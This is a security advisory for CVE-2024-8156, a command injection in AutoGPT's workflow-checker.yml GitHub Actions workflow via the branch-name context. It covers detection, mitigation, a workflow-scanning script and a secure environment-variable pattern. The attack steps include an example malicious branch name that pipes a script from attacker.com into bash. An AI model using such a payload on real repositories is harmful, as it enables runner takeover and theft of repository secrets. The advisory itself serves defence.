CVE-2024-8156 Overview
A command injection vulnerability exists in the workflow-checker.yml workflow of significant-gravitas/autogpt. The untrusted user input github.head_ref is used insecurely, allowing an attacker to inject arbitrary commands. This vulnerability affects versions up to and including the latest version. An attacker can exploit this by creating a branch name with a malicious payload and opening a pull request, potentially leading to reverse shell access or theft of sensitive tokens and keys.
Critical Impact
This command injection vulnerability allows unauthenticated remote attackers to execute arbitrary commands on the GitHub Actions runner, potentially gaining reverse shell access or stealing sensitive repository secrets, tokens, and API keys.
Affected Products
- Agpt AutoGPT Classic (all versions up to and including the latest)
- agpt:autogpt_classic component
- GitHub Actions workflow: workflow-checker.yml
Discovery Timeline
- 2025-03-20 - CVE-2024-8156 published to NVD
- 2025-10-15 - Last updated in NVD database
Technical Details for CVE-2024-8156
Vulnerability Analysis
This vulnerability is classified as CWE-77 (Command Injection), arising from improper neutralization of special elements used in a command. The vulnerable workflow file workflow-checker.yml directly interpolates the github.head_ref context variable into a shell command without proper sanitization or escaping.
In GitHub Actions, the github.head_ref variable contains the name of the head branch in a pull request event. Since branch names are user-controlled, an attacker can craft a malicious branch name containing shell metacharacters and command sequences that will be executed when the workflow runs.
The attack requires no privileges on the target repository—any user who can fork the repository and open a pull request can trigger the vulnerable code path. This makes the vulnerability particularly dangerous for open-source projects that accept community contributions.
Root Cause
The root cause is the unsafe use of GitHub Actions expression syntax (${{ github.head_ref }}) directly within a run: block without proper input validation or escaping. When this expression is evaluated, the branch name is directly interpolated into the shell command, allowing shell metacharacters to be interpreted.
GitHub Actions workflows that use expressions like ${{ github.head_ref }}, ${{ github.event.pull_request.title }}, or similar user-controlled inputs in shell commands are susceptible to this class of vulnerability if the inputs are not properly sanitized.
Attack Vector
The attack vector is network-based and requires no authentication to the target repository. An attacker exploits this vulnerability through the following sequence:
- Fork the vulnerable repository
- Create a branch with a malicious name containing shell injection payload (e.g., feature$(whoami) or test"; curl attacker.com/shell.sh | bash; #)
- Open a pull request from the malicious branch to the target repository
- The GitHub Actions workflow automatically triggers on the pull request event
- The injected commands execute in the context of the GitHub Actions runner with access to repository secrets
This attack can lead to exfiltration of GITHUB_TOKEN and other repository secrets, modification of repository contents, lateral movement to connected services, and supply chain compromise if the repository produces artifacts or releases.
Detection Methods for CVE-2024-8156
Indicators of Compromise
- Unusual pull requests from unknown forks with suspicious branch names containing shell metacharacters (;, |, $(), backticks)
- GitHub Actions workflow logs showing unexpected command execution or network connections
- Anomalous outbound network traffic from GitHub Actions runners to unknown external hosts
- Unauthorized access to repository secrets or unexpected API calls using repository tokens
Detection Strategies
- Audit GitHub Actions workflow files for unsafe use of ${{ github.* }} expressions in run: blocks
- Monitor pull request activity for branch names containing shell metacharacters or encoded payloads
- Review GitHub Actions workflow run logs for command execution anomalies or unexpected outputs
- Implement branch name validation at the repository level to reject names with special characters
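One way to run the workflow audit from the first strategy above, as an added example that is not part of the original advisory or the AutoGPT project: a line-based scanner that reports untrusted context expressions only when they sit inside a run: script, so the env: mapping pattern is not flagged. The context list and the sample workflow are constructed for illustration.

```python
import re

# Attacker-influenced contexts; this list is an assumption and is not exhaustive.
UNTRUSTED = re.compile(
    r"\$\{\{[^}]*?\b(github\.head_ref|github\.event\.pull_request\.(?:title|body)"
    r"|github\.event\.issue\.(?:title|body)|github\.event\.comment\.body)"
    r"\b[^}]*\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")

# Constructed sample workflow: two unsafe steps, one using the env pattern.
SAMPLE = '''\
name: checker
on: pull_request
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: unsafe inline
        run: echo "Branch ${{ github.head_ref }}"
      - name: unsafe block
        run: |
          echo "start"
          echo "PR: ${{ github.event.pull_request.title }}"
      - name: safe
        env:
          BRANCH_NAME: ${{ github.head_ref }}
        run: |
          echo "Branch: $BRANCH_NAME"
'''

def find_unsafe_run_lines(workflow_text):
    """Return (line_number, context) for untrusted expressions in run: scripts."""
    findings, run_col = [], None
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        if run_col is not None and line.strip() and indent <= run_col:
            run_col = None                    # dedent closes the block scalar
        if run_col is not None:
            script = line                     # inside a multi-line run: block
        else:
            m = RUN_KEY.match(line)
            if not m:
                continue
            script = m.group(2)
            if script[:1] in ("|", ">"):      # script starts on the next line
                run_col = len(m.group(1))     # column of the run: key
                continue
        findings += [(lineno, h.group(1)) for h in UNTRUSTED.finditer(script)]
    return findings

if __name__ == "__main__":
    print(find_unsafe_run_lines(SAMPLE))
```

To audit a repository, call the function on the text of each file under .github/workflows/ and treat any finding as a step to rewrite with an environment variable.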
Monitoring Recommendations
- Enable GitHub audit logging and monitor for unusual workflow execution patterns
- Set up alerts for pull requests from first-time contributors with unusual branch naming patterns
- Configure repository rules to require approval before workflows run on pull requests from forks
- Monitor for secrets rotation triggers that might indicate token theft
How to Mitigate CVE-2024-8156
Immediate Actions Required
- Update to the patched version by applying commit 1df7d527dd37dff8363dc162fb58d300f072e302
- Review and rotate any secrets that may have been exposed in previous workflow runs
- Audit existing pull requests for suspicious branch names that may have triggered the vulnerability
- Enable "Require approval for all outside collaborators" in repository workflow settings
Patch Information
The vulnerability has been addressed in the GitHub commit 1df7d527dd37dff8363dc162fb58d300f072e302. Organizations using AutoGPT should update their deployments to include this fix. Additional technical details about the vulnerability discovery can be found in the Huntr bounty report.
Workarounds
- Pass user-controlled inputs as environment variables instead of using direct expression interpolation in shell commands
- Use intermediate steps to sanitize and validate branch names before use in shell commands
- Configure repository settings to require manual approval for workflow runs on pull requests from forks
- Implement branch protection rules that restrict branch naming patterns to alphanumeric characters
```yaml
# Secure pattern: Use environment variables instead of direct interpolation
# Instead of: run: echo "Branch: ${{ github.head_ref }}"
# Use this pattern in your workflow:
env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  # Validate the branch name before use
  if [[ ! "$BRANCH_NAME" =~ ^[a-zA-Z0-9/_-]+$ ]]; then
    echo "Invalid branch name detected"
    exit 1
  fi
  echo "Branch: $BRANCH_NAME"
```


